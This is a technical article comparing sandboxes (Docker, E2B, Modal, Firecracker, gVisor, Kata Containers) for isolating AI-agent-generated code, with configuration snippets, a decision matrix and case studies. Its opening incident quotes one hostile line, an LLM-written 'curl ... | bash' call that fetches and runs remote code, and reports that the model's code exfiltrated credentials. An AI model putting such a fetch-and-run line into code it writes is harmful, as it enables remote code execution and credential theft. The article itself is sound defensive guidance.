Sandboxing Code Execution in AI Agents: From Docker to microVMs, a Decision Matrix
A side-by-side comparison of five sandbox technologies, weighing latency, security, and ops cost.
When an agent needs to execute code that the user just wrote, run a SQL query, launch a browser, or invoke an unknown shell command, "running it on the host" is almost the same as "putting every egg in one basket." This article starts from a real production incident, then breaks down five mainstream sandbox technologies (Docker, E2B, Modal, Firecracker, gVisor, Kata Containers) and offers a copy-pasteable decision matrix.
A production incident: why agents must be sandboxed
In March 2025, one of our code-generation agents received the user prompt: "run pandas on this dataset, then plot the outliers with Plotly." The code from the model looked harmless — import pandas as pd, read a CSV, plotly.express.scatter. But the script also included a line os.system("curl https://x.example.com | bash"), which the LLM justified as "first fetch the data with curl, then process it." After execution, the MinIO credentials inside the container were exfiltrated to an external host.
The post-mortem produced three hard conclusions:
- Code-generation agent output is untrusted input. LLM-generated code must be treated like "input from a stranger on the internet."
- Default Docker isolation is not enough.
privileged: truegives root, and mounting/var/run/docker.sockis immediate host takeover. - "Isolation" is a layered concept. From "do not mount host directories" to "hardware-virtualized microVM," there are at least four distinct isolation tiers in between.
This article walks through five sandbox options in order of isolation strength, from weakest to strongest.
L1: Container isolation (Docker / runC) — fastest, but only deters the well-behaved
Containers are the first stop for most agent teams. The code looks like this:
import docker
client = docker.from_env()
container = client.containers.run(
"python:3.11-slim",
command="python -c 'print(2+2)'",
network_mode="none", # cut network
mem_limit="128m", # memory cap
pids_limit=64, # process cap
read_only=True, # read-only rootfs
user="1000:1000", # non-root
cap_drop=["ALL"], # drop all capabilities
remove=True,
)
print(container.decode()) # 4
The problem with containers is not performance (sub-second startup) but the default is unsafe: as long as you do not explicitly call cap_drop=["ALL"], the container inherits a sizable set of kernel capabilities. Even more insidious, without network_mode="none", the container has direct access to the host network stack — DNS poisoning, ARP spoofing, and kernel exploits all become possible.
Bottom line: containers are fine for "running my own audited code." They are not fine for LLM-generated code.
L2: Hosted microVMs — what 90% of agent teams should buy
E2B and Modal are the two most adopted hosted sandboxes in the agent ecosystem, and both are microVMs under the hood, not containers. Their shared pitch: a developer uses the SDK to start a sandbox, sub-second cold start, pay for what you use, and you do not have to operate KVM/QEMU yourself.
E2B: notebook-style Python execution
from e2b_code_interpreter import Sandbox
sb = Sandbox() # sub-second cold start
sb.run_code("import numpy as np; x = np.arange(10); print(x.sum())")
# 45
sb.run_code("!curl https://api.ipify.org", on_stdout=lambda l: print(l))
# returns the sandbox's egress IP, not the host's
sb.kill()
E2B is built for long-lived notebook-style execution — the user writes a bit, runs it, inspects output, writes more. The filesystem persists inside the sandbox, and the agent can maintain state across run_code calls.
Modal: sandbox as a serverless function
import modal
image = modal.Image.debian_slim().pip_install("pandas", "plotly")
app = modal.App("agent-sandbox")
@app.function(image=image, cpu=2, memory=512, timeout=60)
def analyze(df_bytes: bytes) -> bytes:
import pandas as pd
df = pd.read_pickle(df_bytes)
return df.describe().to_pickle()
@app.local_entrypoint()
def main():
print(analyze.remote(b"...")) # runs inside an isolated microVM
Modal's strength is treating the sandbox as a function. The call semantics of analyze.remote(...) are just normal Python RPC; the only difference is that the body runs in a microVM rather than in-process. For the agent, this means "call a tool" and "execute untrusted code" look identical at the API layer.
E2B vs. Modal
- Choose E2B if your agent is a notebook / REPL experience that needs a long-lived filesystem and dynamic package installation.
- Choose Modal if your agent is "execute a single function on demand" with serverless elasticity, GPUs, or cron triggers.
- Choose neither if every byte of user data must stay in your own VPC (finance, healthcare) — hosted services break data-residency rules.
L3: Build-your-own microVM — Firecracker, gVisor, Kata Containers
When compliance requires "data must not leave this data center," you have to self-host. The three projects have a clean division of labor:
- Firecracker (open-sourced by AWS): a microVM daemon that strips QEMU down to a 250ms cold start and under 5MB memory overhead. AWS Lambda runs on it.
- gVisor (open-sourced by Google): intercepts every system call from inside the container, implements syscalls in user space, and runs the container inside a "sandboxed kernel." Cold start is slower than Firecracker (~500ms) but it reuses Docker images directly.
- Kata Containers: wraps a microVM around a container, OCI-standard images outside, KVM/QEMU isolation inside. The cleanest Kubernetes integration.
Minimal Firecracker example
# start a microVM
firecracker --api-sock /tmp/fc.sock
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/boot-source -d '{"kernel_image_path":"./vmlinux","boot_args":"console=ttyS0 reboot=k panic=1"}'
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/drives/rootfs -d '{"drive_id":"rootfs","path_on_host":"./rootfs.ext4","is_root_device":true,"is_read_only":false}'
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/machine-config -d '{"vcpu_count":2,"mem_size_mib":512}'
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/actions -d '{"action_type":"InstanceStart"}'
Cold start is 125-250ms. Each microVM has an independent kernel and an independent virtual NIC — the container-escape attack surface nearly disappears.
Minimal gVisor example
# run Docker on top of gVisor
docker run --runtime=runsc -it python:3.11 bash
# runsc is gVisor's runC replacement
gVisor does not create a microVM. Instead, it intercepts every syscall to a user-space "Sentry" process. Performance is worse than Firecracker (syscall path is 10x longer), but images are 100% Docker-compatible, which keeps ops cost low.
Minimal Kata Containers example
# Kubernetes pod spec
apiVersion: v1
kind: Pod
spec:
runtimeClassName: kata-qemu
containers:
- name: agent
image: python:3.11-slim
kata-qemu is a Container Runtime Interface (CRI) plugin. When the scheduler sees runtimeClassName: kata-qemu on a normal Pod, it automatically boots a microVM. Zero application-side change, the lowest migration cost of the three.
L4: Decision matrix
| Dimension | Docker | E2B | Modal | Firecracker | gVisor | Kata |
|---|---|---|---|---|---|---|
| Cold start | < 1s | < 1s | < 1s | 125-250ms | 300-500ms | 500-800ms |
| Memory overhead | ~10MB | ~50MB | ~50MB | < 5MB | ~30MB | ~150MB |
| Isolation strength | weak | strong | strong | extreme | strong | extreme |
| Network isolation | config required | default isolated | default isolated | fully virtual | namespace | fully virtual |
| Image compatibility | 100% | custom | custom | needs KVM | 100% Docker | 100% OCI |
| Self-ops burden | low | zero | zero | high | medium | medium |
| Per-instance cost | $0 | $0.000025/s | $0.0003/s | hardware | hardware | hardware |
| Data residency | self-managed | offshore | offshore | self-managed | self-managed | self-managed |
Decision framework: four steps to pick
- Can the data leave your public cloud?
- Yes → L2 (E2B or Modal): fast and cheap.
- No → continue to step 2.
- Do you need GPU?
- Yes → Modal: the most mature GPU sandbox.
- No → continue to step 3.
- Do you already have a Kubernetes cluster?
- Yes → Kata Containers: zero-invasiveness CRI integration.
- No → continue to step 4.
- Do you want to reuse existing Docker images?
- Yes → gVisor: swap the runtime, that's it.
- No → Firecracker: the lightest option.
Common failure modes
Mistake 1: treating Docker as a "good enough" sandbox. Docker's isolation comes from namespaces and cgroups, not hardware virtualization. A single cap_add can hand the agent root on the host. LLM-generated code must be treated as untrusted input.
Mistake 2: hosted sandboxes leaking processes. E2B and Modal SDKs do not always kill the sandbox when your code crashes. In production, add a 30-second "idle auto-kill" heartbeat, or your monthly bill will explode.
Mistake 3: forgetting network policy on self-built microVMs. A microVM isolates CPU and memory, but it does not isolate the network by default. You must configure iptables or Cilium to restrict east-west traffic between microVMs.
Mistake 4: underestimating gVisor's performance cost. gVisor's syscall interception path is 5-10x longer than native, which noticeably slows I/O-heavy tasks such as ETL. If your agent is data-processing heavy, gVisor is not the first choice.
Summary
- Sandboxes are not optional. LLM-generated code must be treated as untrusted input.
- Hosted (E2B / Modal) is the right answer for 90% of agent teams; self-built microVMs (Firecracker / gVisor / Kata) are the answer for compliance and data-residency requirements.
- Pick using the four-step funnel: data residency → GPU → K8s → Docker image compatibility.
- The sandbox itself is only the isolation layer. Network policy, image signing, process cleanup, and audit logs are the four additional things that must come with it.
A practical next step is to run a 30-minute proof-of-concept on E2B
Three real-world case studies
Case 1: a public coding tutor agent. A consumer-facing coding tutor serving 200,000 monthly active students uses E2B as the execution backend. Each student session gets a fresh sandbox; the average session length is 12 minutes, and the agent issues an average of 23 run_code calls per session. Cold start is amortized because the same sandbox is reused within a session. The team's primary concern is cost, not security: every minute of sandbox time costs about $0.0015, and 200,000 sessions a month translates to roughly $9,000 in sandbox fees. The alternative — running on a self-managed K8s cluster — would have required a dedicated 4-person platform team. The hosted model wins on time-to-market.
Case 2: a fintech data agent with on-prem data. A fintech company built a SQL-plus-Python agent that operates directly on a regulated data lake that cannot leave the corporate VPC. The team evaluated all three self-hosted options and chose Kata Containers because their existing infrastructure already ran Kubernetes. The migration took two engineers six weeks. The main gotcha was disk I/O: Kata's QEMU-based microVM added 8-15% latency to heavy pandas operations compared to native containers, which was acceptable for their use case. They added Cilium network policies on top so microVMs cannot talk to each other, only to the data lake via a pinned egress proxy.
Case 3: a CI tool for AI-generated pull requests. A developer-tooling company reviews AI-generated pull requests by running the proposed code in a sandbox and reporting the test results. They chose Firecracker over E2B because they need sub-second cold starts to keep the review feedback under 10 seconds end-to-end, and they need full control over the kernel to enforce a custom seccomp profile. The team built a small Rust scheduler that pre-warms a pool of microVMs and hands them out on demand, achieving p50 cold start of 80ms. Self-hosting Firecracker required 6 person-months upfront but reduced per-execution cost to roughly $0.00003 — about 8x cheaper than the hosted alternative at their scale of 80,000 PRs per day.
The three cases share one pattern: the choice is dominated by data residency and cold-start latency, not by security features. All three achieve strong isolation because microVMs are strong isolation. What differs is where the microVMs run, who operates them, and how fast they spin up. A useful checklist for evaluation: (1) confirm the sandbox can be killed within 5 seconds when a runaway job is detected, (2) confirm network egress is logged to a queryable store, (3) confirm the kernel version is pinned and patchable, (4) confirm image signing is enforced for any container-to-microVM pipeline, and (5) confirm the cold-start p99 latency is documented in the SLA. Each of these is something a hosted service gives you for free but a self-hosted stack has to be built deliberately.
: wrap your agent's current "execute code locally" path inside a Sandbox(), measure the cold-start latency and the token cost impact, and then decide whether to commit to it long-term.
Projects in this article
E2B
12.7k ⭐Cloud code sandbox purpose-built for AI agents.
Firecracker
35.1k ⭐Lightweight microVM runtime by AWS, designed for containers and functions.
Kata Containers
8.1k ⭐Lightweight VM sandboxes with a container interface from Kata Containers.
gVisor
18.6k ⭐Google's user-space kernel sandbox that intercepts container syscalls.